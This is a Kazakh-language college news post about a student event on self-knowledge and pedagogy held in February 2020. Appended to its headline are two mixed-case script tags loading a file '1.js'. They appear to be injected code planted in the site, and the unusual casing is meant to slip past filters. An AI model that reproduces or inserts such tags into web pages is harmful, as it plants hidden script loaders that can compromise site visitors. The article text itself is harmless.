Өзін-өзі тану пәні бойынша «Болашақ бүгіннен басталады» атты колледжішілік іс-шара өтті<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.02.2020

Мемлекеттік деңгейде 2020 жылдың ақпан айының 03-12 аралығында «Өзін-өзі тану Махаббат пен шығармашылық педагогикасы» атты онкүндік декадасы аясында Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде «Педагогика және психология» кафедрасының оқытушысы Б.Секенованың ұйымдастыруымен «Болашақ бүгіннен басталады» тақырыбында іс-шара өтті.

«Студенттерді тарта отырып, театрланған қойылымдар мен спектакльдер қою» тарауы бойынша Филология бөлімінің 3 курс студенттерімен танымдық бағытта жұмыстар жүргізіліп, сөз саптау, сахналық қойылымдарда өзін ұстау сынды шеберліктерін көрсетті.

Іс-шараның мақсаты: студенттерге алдарына қойған биік өмірлік мақсаттарына жетуде жол көрсетіп, бағыт-бағдар беру, студенттердің рухани мүмкіндіктерін дамыту мен адамгершілік-рухани әлеуеттерін байыту, ізденімпаз тұлғаны қалыптастыру, құзіретті педагог сапаларын, білім, білік, ептілік, икемділік, іскерлік  дағдыларды бойларына сіңіру.

 

 

Просмотров: 547


Пікір қосу



Деректерді қолтаңбаға қосу